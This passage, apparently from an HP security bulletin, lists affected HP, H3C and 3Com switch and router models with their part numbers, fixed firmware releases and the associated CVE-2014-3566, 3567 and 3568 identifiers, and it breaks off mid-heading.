Chassis\nJG375A HP 10500 TAA Main Processing Unit\nJG820A HP 10504 TAA Switch Chassis\nJG821A HP 10508 TAA Switch Chassis\nJG822A HP 10508-V TAA Switch Chassis\nJG823A HP 10512 TAA Switch Chassis\n\n CVE-2014-3566\nCVE-2014-3568\n\n10500 Switch Series (Comware v7)\n R2111P06\n JC611A HP 10508-V Switch Chassis\nJC612A HP 10508 Switch Chassis\nJC613A HP 10504 Switch Chassis\nJC748A HP 10512 Switch Chassis\nJG820A HP 10504 TAA Switch Chassis\nJG821A HP 10508 TAA Switch Chassis\nJG822A HP 10508-V TAA Switch Chassis\nJG823A HP 10512 TAA Switch Chassis\nJG496A HP 10500 Type A MPU w/Comware v7 OS\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n9500E\n R1828P06\n JC124A HP A9508 Switch Chassis\nJC124B HP 9505 Switch Chassis\nJC125A HP A9512 Switch Chassis\nJC125B HP 9512 Switch Chassis\nJC474A HP A9508-V Switch Chassis\nJC474B HP 9508-V Switch Chassis\n H3C S9505E Routing-Switch Chassis (0235A0G6)\nH3C S9512E Routing-Switch Chassis (0235A0G7)\nH3C S9508E-V Routing-Switch Chassis (0235A38Q)\nH3C S9505E Chassis w/ Fans (0235A38P)\nH3C S9512E Chassis w/ Fans (0235A38R)\n\n CVE-2014-3566\nCVE-2014-3568\n\n7900\n R2122\n JG682A HP FlexFabric 7904 Switch Chassis\nJH001A HP FF 7910 2.4Tbps Fabric / MPU\nJG842A HP FF 7910 7.2Tbps Fabric / MPU\nJG841A HP FF 7910 Switch Chassis\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n7500 Switch Series\n R6708P10\n JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T\nJC697A HP A7502 TAA Main Processing Unit\nJC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE\nJC699A HP A7500 384Gbps TAA Fab/MPU w 2p 10-GbE\nJC700A HP A7500 384 Gbps TAA Fabric / MPU\nJC701A HP A7510 768 Gbps TAA Fabric / MPU\nJD193A HP 384 Gbps A7500 Fab Mod w/2 XFP Ports\nJD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports\nJD194A HP 384 Gbps Fabric A7500 Module\nJD194B HP 7500 384Gbps Fabric Module\nJD195A HP 7500 384Gbps Advanced Fabric Module\nJD196A HP 7502 Fabric Module\nJD220A HP 7500 768Gbps Fabric Module\nJD238A HP A7510 Switch Chassis\nJD238B HP 7510 Switch Chassis\nJD239A HP A7506 Switch Chassis\nJD239B HP 7506 Switch Chassis\nJD240A HP A7503 Switch Chassis\nJD240B HP 7503 Switch Chassis\nJD241A HP A7506 Vertical Switch Chassis\nJD241B HP 7506-V Switch Chassis\nJD242A HP A7502 Switch Chassis\nJD242B HP 7502 Switch Chassis\nJD243A HP A7503 Switch Chassis w/1 Fabric Slot\nJD243B HP 7503-S Switch Chassis w/1 Fabric Slot\n H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4)\nH3C S7503E Ethernet Switch Chassis with Fan (0235A0G2)\nH3C S7503E-S Ethernet Switch Chassis with Fan (0235A0G5)\nH3C S7506E Ethernet Switch Chassis with Fan (0235A0G1)\nH3C S7506E-V Ethernet Switch Chassis with Fan (0235A0G3)\nH3C S7510E Ethernet Switch Chassis with Fan (0235A0G0)\nH3C S7502E Chassis w/ fans (0235A29A)\nH3C S7503E Chassis w/ fans (0235A27R)\nH3C S7503E-S Chassis w/ fans (0235A33R)\nH3C S7506E Chassis w/ fans (0235A27Q)\nH3C S7506E-V Chassis w/ fans (0235A27S)\n\n CVE-2014-3566\nCVE-2014-3568\n\nHSR6800\n R3303P18\n JG361A HP HSR6802 Router Chassis\nJG362A HP HSR6804 Router Chassis\nJG363A HP HSR6808 Router Chassis\nJG364A HP HSR6800 RSE-X2 Router MPU\nJG779A HP HSR6800 RSE-X2 Router TAA MPU\n\n CVE-2014-3566\nCVE-2014-3568\n\nHSR6800 Russian Version\n R3303P18\n JG361A HP HSR6802 Router Chassis\nJG362A HP HSR6804 Router Chassis\nJG363A HP HSR6808 Router Chassis\nJG364A HP HSR6800 RSE-X2 Router MPU\nJG779A HP HSR6800 RSE-X2 Router TAA MPU\n\n CVE-2014-3566\nCVE-2014-3568\n\nHSR6602\n R3303P18\n JG353A HP HSR6602-G Router\nJG354A HP HSR6602-XG Router\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\nJG777A HP HSR6602-XG TAA Router\n\n CVE-2014-3566\nCVE-2014-3568\n\nHSR6602 Russian Version\n R3303P18\n JG353A HP HSR6602-G Router\nJG354A HP HSR6602-XG Router\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\n\n CVE-2014-3566\nCVE-2014-3568\n\n6602\n R3303P18\n JC176A HP 6602 Router Chassis\n H3C SR6602 1U Router Host (0235A27D)\n\n CVE-2014-3566\nCVE-2014-3568\n\n6602 Russian Version\n R3303P18\n JC176A HP 6602 Router Chassis\n H3C SR6602 1U Router Host (0235A27D)\n\n CVE-2014-3566\nCVE-2014-3568\n\nA6600\n R3303P18\n JC165A HP 6600 RPE-X1 Router Module\nJC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJC566A HP A6600 RSE-X1 Main Processing Unit\nJG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR66-RPE-X1-H3 (0231A761)\nH3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n CVE-2014-3566\nCVE-2014-3568\n\nA6600 Russian Version\n R3303P18\n JC165A HP 6600 RPE-X1 Router Module\nJC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJC566A HP A6600 RSE-X1 Main Processing Unit\nJG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR66-RPE-X1-H3 (0231A761)\nH3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n CVE-2014-3566\nCVE-2014-3568\n\n6600 MCP\n R3303P18\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU\nJG356A HP 6600 MCP-X2 Router MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n CVE-2014-3566\nCVE-2014-3568\n\n6600 MCP Russian Version\n R3303P18\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJG355A HP 6600 MCP-X1 Router MPU\nJG356A HP 6600 MCP-X2 Router MPU\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\nJG778A HP 6600 MCP-X2 Router TAA MPU\n\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5920 Switch Series\n R2311P05\n JG296A HP 5920AF-24XG Switch\nJG555A HP 5920AF-24XG TAA Switch\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n5900 Switch Series\n R2311P05\n JC772A HP 5900AF-48XG-4QSFP+ Switch\nJG336A HP 5900AF-48XGT-4QSFP+ Switch\nJG510A HP 5900AF-48G-4XG-2QSFP+ Switch\nJG554A HP 5900AF-48XG-4QSFP+ TAA Switch\nJG838A HP FF 5900CP-48XG-4QSFP+ Switch\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n5830 Switch Series\n R1118P11\n JC691A HP A5830AF-48G Switch w/1 Interface Slot\nJC694A HP A5830AF-96G Switch\nJG316A HP 5830AF-48G TAA Switch w/1 Intf Slot\nJG374A HP 5830AF-96G TAA Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n5820 Switch Series\n R1809P03\n JC102A HP 5820-24XG-SFP+ Switch\nJC106A HP 5820-14XG-SFP+ Switch with 2 Slots\nJG219A HP 5820AF-24XG Switch\nJG243A HP 5820-24XG-SFP+ TAA-compliant Switch\nJG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots\n H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media\nmodules Plus OSM (0235A37L)\nH3C S5820X-28S 24-port 10GBASE-X (SFP Plus ) Plus 4-port 10/100/1000BASE-T\n(RJ45) (0235A370)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5800 Switch Series\n R1809P03\n JC099A HP 5800-24G-PoE Switch\nJC100A HP 5800-24G Switch\nJC101A HP 5800-48G Switch with 2 Slots\nJC103A HP 5800-24G-SFP Switch\nJC104A HP 5800-48G-PoE Switch\nJC105A HP 5800-48G Switch\nJG225A HP 5800AF-48G Switch\nJG242A HP 5800-48G-PoE+ TAA Switch w 2 Slots\nJG254A HP 5800-24G-PoE+ TAA-compliant Switch\nJG255A HP 5800-24G TAA-compliant Switch\nJG256A HP 5800-24G-SFP TAA Switch w 1 Intf Slt\nJG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot\nJG258A HP 5800-48G TAA Switch w 1 Intf Slot\n H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot\n(0235A36U)\nH3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port 10GBASE-X\n(SFP Plus ) Plus 1 media module PoE (0235A36S)\nH3C S5800-32F 24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus\nmedia module (no power) (0235A374)\nH3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus 4port 10GBASE-X (SFP Plus\n) Plus media module (0235A379)\nH3C S5800-56C-PWR 48-port BT Plus 4 port (SFP Plus ) Plus media module\n(0235A378)\nH3C S5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM\n(0235A36W)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5700\n R2311P05\n JG894A HP FF 5700-48G-4XG-2QSFP+ Switch\nJG895A HP FF 5700-48G-4XG-2QSFP+ TAA Switch\nJG896A HP FF 5700-40XG-2QSFP+ Switch\nJG897A HP FF 5700-40XG-2QSFP+ TAA Switch\nJG898A HP FF 5700-32XGT-8XG-2QSFP+ Switch\nJG899A HP FF 5700-32XGT-8XG-2QSFP+ TAA Switch\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n5500 HI Switch Series\n R5501P06\n JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch\nJG312A HP HI 5500-48G-4SFP w/2 Intf Slts Switch\nJG541A HP 5500-24G-PoE+-4SFP HI Switch w/2 Slt\nJG542A HP 5500-48G-PoE+-4SFP HI Switch w/2 Slt\nJG543A HP 5500-24G-SFP HI Switch w/2 Intf Slt\nJG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt\nJG680A HP 5500-48G-PoE+-4SFP HI TAA Swch w/2Slt\nJG681A HP 5500-24G-SFP HI TAA Swch w/2Slt\n\n CVE-2014-3566\nCVE-2014-3568\n\n5500 EI Switch Series\n R2221P08\n JD373A HP 5500-24G DC EI Switch\nJD374A HP 5500-24G-SFP EI Switch\nJD375A HP 5500-48G EI Switch\nJD376A HP 5500-48G-PoE EI Switch\nJD377A HP 5500-24G EI Switch\nJD378A HP 5500-24G-PoE EI Switch\nJD379A HP 5500-24G-SFP DC EI Switch\nJG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts\nJG241A HP 5500-24G-PoE+ EI Switch w/2 Intf Slts\nJG249A HP 5500-24G-SFP EI TAA Switch w 2 Slts\nJG250A HP 5500-24G EI TAA Switch w 2 Intf Slts\nJG251A HP 5500-48G EI TAA Switch w 2 Intf Slts\nJG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts\nJG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts\n H3C S5500-28C-EI Ethernet Switch (0235A253)\nH3C S5500-28F-EI Eth Switch AC Single (0235A24U)\nH3C S5500-52C-EI Ethernet Switch (0235A24X)\nH3C S5500-28C-EI-DC Ethernet Switch (0235A24S)\nH3C S5500-28C-PWR-EI Ethernet Switch (0235A255)\nH3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259)\nH3C S5500-52C-PWR-EI Ethernet Switch (0235A251)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5500 SI Switch Series\n R2221P08\n JD369A HP 5500-24G SI Switch\nJD370A HP 5500-48G SI Switch\nJD371A HP 5500-24G-PoE SI Switch\nJD372A HP 5500-48G-PoE SI Switch\nJG238A HP 5500-24G-PoE+ SI Switch w/2 Intf Slts\nJG239A HP 5500-48G-PoE+ SI Switch w/2 Intf Slts\n H3C S5500-28C-SI Ethernet Switch (0235A04U)\nH3C S5500-52C-SI Ethernet Switch (0235A04V)\nH3C S5500-28C-PWR-SI Ethernet Switch (0235A05H)\nH3C S5500-52C-PWR-SI Ethernet Switch (0235A05J)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5130 EI switch Series\n R3108P03\n JG932A HP 5130-24G-4SFP+ EI Switch\nJG933A HP 5130-24G-SFP-4SFP+ EI Switch\nJG934A HP 5130-48G-4SFP+ EI Switch\nJG936A HP 5130-24G-PoE+-4SFP+ EI Swch\nJG937A HP 5130-48G-PoE+-4SFP+ EI Swch\nJG975A HP 5130-24G-4SFP+ EI BR Switch\nJG976A HP 5130-48G-4SFP+ EI BR Switch\nJG977A HP 5130-24G-PoE+-4SFP+ EI BR Swch\nJG978A HP 5130-48G-PoE+-4SFP+ EI BR Swch\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n5120 EI Switch Series\n R2221P08\n JE066A HP 5120-24G EI Switch\nJE067A HP 5120-48G EI Switch\nJE068A HP 5120-24G EI Switch with 2 Slots\nJE069A HP 5120-48G EI Switch with 2 Slots\nJE070A HP 5120-24G-PoE EI Switch with 2 Slots\nJE071A HP 5120-48G-PoE EI Switch with 2 Slots\nJG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts\nJG237A HP 5120-48G-PoE+ EI Switch w/2 Intf Slts\nJG245A HP 5120-24G EI TAA Switch w 2 Intf Slts\nJG246A HP 5120-48G EI TAA Switch w 2 Intf Slts\nJG247A HP 5120-24G-PoE+ EI TAA Switch w 2 Slts\nJG248A HP 5120-48G-PoE+ EI TAA Switch w 2 Slts\n H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ)\nH3C S5120-28C-EI 24GE Plus 4Combo Plus 2Slt (0235A0BS)\nH3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR)\nH3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT)\nH3C S5120-28C-PWR-EI 24G Plus 4C Plus 2S Plus POE (0235A0BU)\nH3C S5120-52C-PWR-EI 48G Plus 4C Plus 2S Plus POE (0235A0BV)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5120 SI switch Series\n R1513P95\n JE072A HP 5120-48G SI Switch\nJE073A HP 5120-16G SI Switch\nJE074A HP 5120-24G SI Switch\nJG091A HP 5120-24G-PoE+ (370W) SI Switch\nJG092A HP 5120-24G-PoE+ (170W) SI Switch\n H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W)\nH3C S5120-20P-SI L2\n16GE Plus 4SFP (0235A42B)\nH3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D)\nH3C S5120-28P-HPWR-SI (0235A0E5)\nH3C S5120-28P-PWR-SI (0235A0E3)\n\n CVE-2014-3566\nCVE-2014-3568\n\n4800 G Switch Series\n R2221P08\n JD007A HP 4800-24G Switch\nJD008A HP 4800-24G-PoE Switch\nJD009A HP 4800-24G-SFP Switch\nJD010A HP 4800-48G Switch\nJD011A HP 4800-48G-PoE Switch\n\n 3Com Switch 4800G 24-Port (3CRS48G-24-91)\n3Com Switch 4800G 24-Port SFP (3CRS48G-24S-91)\n3Com Switch 4800G 48-Port (3CRS48G-48-91)\n3Com Switch 4800G PWR 24-Port (3CRS48G-24P-91)\n3Com Switch 4800G PWR 48-Port (3CRS48G-48P-91)\n CVE-2014-3566\nCVE-2014-3568\n\n4510G Switch Series\n R2221P08\n JF428A HP 4510-48G Switch\nJF847A HP 4510-24G Switch\n\n 3Com Switch 4510G 48 Port (3CRS45G-48-91)\n3Com Switch 4510G PWR 24-Port (3CRS45G-24P-91)\n3Com Switch E4510-24G (3CRS45G-24-91)\n CVE-2014-3566\nCVE-2014-3568\n\n4210G Switch Series\n R2221P08\n JF844A HP 4210-24G Switch\nJF845A HP 4210-48G Switch\nJF846A HP 4210-24G-PoE Switch\n\n 3Com Switch 4210-24G (3CRS42G-24-91)\n3Com Switch 4210-48G (3CRS42G-48-91)\n3Com Switch E4210-24G-PoE (3CRS42G-24P-91)\n CVE-2014-3566\nCVE-2014-3568\n\n3610 Switch Series\n R5319P10\n JD335A HP 3610-48 Switch\nJD336A HP 3610-24-4G-SFP Switch\nJD337A HP 3610-24-2G-2G-SFP Switch\nJD338A HP 3610-24-SFP Switch\n H3C S3610-52P - model LS-3610-52P-OVS (0235A22C)\nH3C S3610-28P - model LS-3610-28P-OVS (0235A22D)\nH3C S3610-28TP - model LS-3610-28TP-OVS (0235A22E)\nH3C S3610-28F - model LS-3610-28F-OVS (0235A22F)\n\n CVE-2014-3566\nCVE-2014-3568\n\n3600 V2 Switch Series\n R2110P03\n JG299A HP 3600-24 v2 EI Switch\nJG300A HP 3600-48 v2 EI Switch\nJG301A HP 3600-24-PoE+ v2 EI Switch\nJG301B HP 3600-24-PoE+ v2 EI Switch\nJG302A HP 3600-48-PoE+ v2 EI Switch\nJG302B HP 3600-48-PoE+ v2 EI Switch\nJG303A HP 3600-24-SFP v2 EI Switch\nJG304A HP 3600-24 v2 SI Switch\nJG305A HP 3600-48 v2 SI Switch\nJG306A HP 3600-24-PoE+ v2 SI Switch\nJG306B HP 3600-24-PoE+ v2 SI Switch\nJG307A HP 3600-48-PoE+ v2 SI Switch\nJG307B HP 3600-48-PoE+ v2 SI Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n3100V2\n R5203P11\n JD313B HP 3100-24-PoE v2 EI Switch\nJD318B HP 3100-8 v2 EI Switch\nJD319B HP 3100-16 v2 EI Switch\nJD320B HP 3100-24 v2 EI Switch\nJG221A HP 3100-8 v2 SI Switch\nJG222A HP 3100-16 v2 SI Switch\nJG223A HP 3100-24 v2 SI Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n3100V2-48\n R2110P03\n JG315A HP 3100-48 v2 Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n1920\n R1105\n JG920A HP 1920-8G Switch\nJG921A HP 1920-8G-PoE+ (65W) Switch\nJG922A HP 1920-8G-PoE+ (180W) Switch\nJG923A HP 1920-16G Switch\nJG924A HP 1920-24G Switch\nJG925A HP 1920-24G-PoE+ (180W) Switch\nJG926A HP 1920-24G-PoE+ (370W) Switch\nJG927A HP 1920-48G Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n1910 R11XX\n R1107\n JG536A HP 1910-8 Switch\nJG537A HP 1910-8 -PoE+ Switch\nJG538A HP 1910-24 Switch\nJG539A HP 1910-24-PoE+ Switch\nJG540A HP 1910-48 Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n1910 R15XX\n R1513P95\n JE005A HP 1910-16G Switch\nJE006A HP 1910-24G Switch\nJE007A HP 1910-24G-PoE (365W) Switch\nJE008A HP 1910-24G-PoE(170W) Switch\nJE009A HP 1910-48G Switch\nJG348A HP 1910-8G Switch\nJG349A HP 1910-8G-PoE+ (65W) Switch\nJG350A HP 1910-8G-PoE+ (180W) Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n1620\n R1104\n JG912A HP 1620-8G Switch\nJG913A HP 1620-24G Switch\nJG914A HP 1620-48G Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR20-1X\n R2513P33\n JD431A HP MSR20-10 Router\nJD667A HP MSR20-15 IW Multi-Service Router\nJD668A HP MSR20-13 Multi-Service Router\nJD669A HP MSR20-13 W Multi-Service Router\nJD670A HP MSR20-15 A Multi-Service Router\nJD671A HP MSR20-15 AW Multi-Service Router\nJD672A HP MSR20-15 I Multi-Service Router\nJD673A HP MSR20-11 Multi-Service Router\nJD674A HP MSR20-12 Multi-Service Router\nJD675A HP MSR20-12 W Multi-Service Router\nJD676A HP MSR20-12 T1 Multi-Service Router\nJF236A HP MSR20-15-I Router\nJF237A HP MSR20-15-A Router\nJF238A HP MSR20-15-I-W Router\nJF239A HP MSR20-11 Router\nJF240A HP MSR20-13 Router\nJF241A HP MSR20-12 Router\nJF806A HP MSR20-12-T Router\nJF807A HP MSR20-12-W Router\nJF808A HP MSR20-13-W Router\nJF809A HP MSR20-15-A-W Router\nJF817A HP MSR20-15 Router\nJG209A HP MSR20-12-T-W Router (NA)\nJG210A HP MSR20-13-W Router (NA)\n H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)\nH3C MSR 20-10 (0235A0A7)\nH3C RT-MSR2011-AC-OVS-H3 (0235A395)\nH3C RT-MSR2012-AC-OVS-H3 (0235A396)\nH3C RT-MSR2012-AC-OVS-W-H3 (0235A397)\nH3C RT-MSR2012-T-AC-OVS-H3 (0235A398)\nH3C RT-MSR2013-AC-OVS-H3 (0235A390)\nH3C RT-MSR2013-AC-OVS-W-H3 (0235A391)\nH3C RT-MSR2015-AC-OVS-A-H3 (0235A392)\nH3C RT-MSR2015-AC-OVS-AW-H3 (0235A393)\nH3C RT-MSR2015-AC-OVS-I-H3 (0235A394)\nH3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V)\nH3C MSR 20-11 (0235A31V)\nH3C MSR 20-12 (0235A32E)\nH3C MSR 20-12 T1 (0235A32B)\nH3C MSR 20-13 (0235A31W)\nH3C MSR 20-13 W (0235A31X)\nH3C MSR 20-15 A (0235A31Q)\nH3C MSR 20-15 A W (0235A31R)\nH3C MSR 20-15 I (0235A31N)\nH3C MSR 20-15 IW (0235A31P)\nH3C MSR20-12 W (0235A32G)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30\n R2513P33\n JD654A HP MSR30-60 POE Multi-Service Router\nJD657A HP MSR30-40 Multi-Service Router\nJD658A HP MSR30-60 Multi-Service Router\nJD660A HP MSR30-20 POE Multi-Service Router\nJD661A HP MSR30-40 POE Multi-Service Router\nJD666A HP MSR30-20 Multi-Service Router\nJF229A HP MSR30-40 Router\nJF230A HP MSR30-60 Router\nJF232A HP RT-MSR3040-AC-OVS-AS-H3\nJF235A HP MSR30-20 DC Router\nJF284A HP MSR30-20 Router\nJF287A HP MSR30-40 DC Router\nJF801A HP MSR30-60 DC Router\nJF802A HP MSR30-20 PoE Router\nJF803A HP MSR30-40 PoE Router\nJF804A HP MSR30-60 PoE Router\n H3C MSR 30-20 Router (0235A328)\nH3C MSR 30-40 Router Host(DC) (0235A268)\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322)\nH3C RT-MSR3020-DC-OVS-H3 (0235A267)\nH3C RT-MSR3040-AC-OVS-H (0235A299)\nH3C RT-MSR3040-AC-POE-OVS-H3 (0235A323)\nH3C RT-MSR3060-AC-OVS-H3 (0235A320)\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\nH3C RT-MSR3060-DC-OVS-H3 (0235A269)\nH3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S)\nH3C MSR 30-20 (0235A19L)\nH3C MSR 30-20 POE (0235A239)\nH3C MSR 30-40 (0235A20J)\nH3C MSR 30-40 POE (0235A25R)\nH3C MSR 30-60 (0235A20K)\nH3C MSR 30-60 POE (0235A25S)\nH3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30-16\n R2513P33\n JD659A HP MSR30-16 POE Multi-Service Router\nJD665A HP MSR30-16 Multi-Service Router\nJF233A HP MSR30-16 Router\nJF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327)\nH3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\nH3C MSR 30-16 (0235A237)\nH3C MSR 30-16 POE (0235A238)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30-1X\n R2513P33\n JF800A HP MSR30-11 Router\nJF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\nJG182A HP MSR30-11E Router\nJG183A HP MSR30-11F Router\nJG184A HP MSR30-10 DC Router\n H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)\nH3C RT-MSR3011-AC-OVS-H3 (0235A29L)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR50\n R2513P33\n JD433A HP MSR50-40 Router\nJD653A HP MSR50 Processor Module\nJD655A HP MSR50-40 Multi-Service Router\nJD656A HP MSR50-60 Multi-Service Router\nJF231A HP MSR50-60 Router\nJF285A HP MSR50-40 DC Router\nJF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297)\nH3C MSR5040-DC-OVS-H3C (0235A20P)\nH3C RT-MSR5060-AC-OVS-H3 (0235A298)\nH3C MSR 50-40 Chassis (0235A20N)\nH3C MSR 50-60 Chassis (0235A20L)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR50-G2\n R2513P33\n JD429A HP MSR50 G2 Processor Module\nJD429B HP MSR50 G2 Processor Module\n H3C H3C MSR 50 Processor Module-G2 (0231A84Q)\nH3C MSR 50 High Performance Main Processing Unit 3GE (Combo)\n256F/1GD(0231A0KL)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR20 Russian version\n MSR201X_5.20.R2513L40.RU\n JD663B HP MSR20-21 Router\nJF228A HP MSR20-40 Router\nJF283A HP MSR20-20 Router\n H3C RT-MSR2020-AC-OVS-H3C (0235A324)\nH3C RT-MSR2040-AC-OVS-H3 (0235A326)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR20-1X Russian version\n MSR201X_5.20.R2513L40.RU\n JD431A HP MSR20-10 Router\nJF236A HP MSR20-15-I Router\nJF237A HP MSR20-15-A Router\nJF238A HP MSR20-15-I-W Router\nJF239A HP MSR20-11 Router\nJF240A HP MSR20-13 Router\nJF241A HP MSR20-12 Router\nJF806A HP MSR20-12-T Router\nJF807A HP MSR20-12-W Router\nJF808A HP MSR20-13-W Router\nJF809A HP MSR20-15-A-W Router\nJF817A HP MSR20-15 Router\n H3C MSR 20-10 (0235A0A7)\nH3C RT-MSR2015-AC-OVS-I-H3 (0235A394)\nH3C RT-MSR2015-AC-OVS-A-H3 (0235A392)\nH3C RT-MSR2015-AC-OVS-AW-H3 (0235A393)\nH3C RT-MSR2011-AC-OVS-H3 (0235A395)\nH3C RT-MSR2013-AC-OVS-H3 (0235A390)\nH3C RT-MSR2012-AC-OVS-H3 (0235A396)\nH3C RT-MSR2012-T-AC-OVS-H3 (0235A398)\nH3C RT-MSR2012-AC-OVS-W-H3 (0235A397)\nH3C RT-MSR2013-AC-OVS-W-H3 (0235A391)\nH3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V)\nH3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30 Russian version\n MSR201X_5.20.R2513L40.RU\n JF229A HP MSR30-40 Router\nJF230A HP MSR30-60 Router\nJF235A HP MSR30-20 DC Router\nJF284A HP MSR30-20 Router\nJF287A HP MSR30-40 DC Router\nJF801A HP MSR30-60 DC Router\nJF802A HP MSR30-20 PoE Router\nJF803A HP MSR30-40 PoE Router\nJF804A HP MSR30-60 PoE Router\n H3C RT-MSR3040-AC-OVS-H (0235A299)\nH3C RT-MSR3060-AC-OVS-H3 (0235A320)\nH3C RT-MSR3020-DC-OVS-H3 (0235A267)\nH3C MSR 30-20 Router (0235A328)\nH3C MSR 30-40 Router Host(DC) (0235A268)\nH3C RT-MSR3060-DC-OVS-H3 (0235A269)\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322)\nH3C RT-MSR3040-AC-POE-OVS-H3 (0235A323)\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30-16 Russian version\n MSR201X_5.20.R2513L40.RU\n JF233A HP MSR30-16 Router\nJF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327)\nH3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30-1X Russian version\n MSR201X_5.20.R2513L40.RU\n JF800A HP MSR30-11 Router\nJF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\nJG182A HP MSR30-11E Router\nJG183A HP MSR30-11F Router\nJG184A HP MSR30-10 DC Router\n H3C RT-MSR3011-AC-OVS-H3 (0235A29L)\nH3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR50 Russian 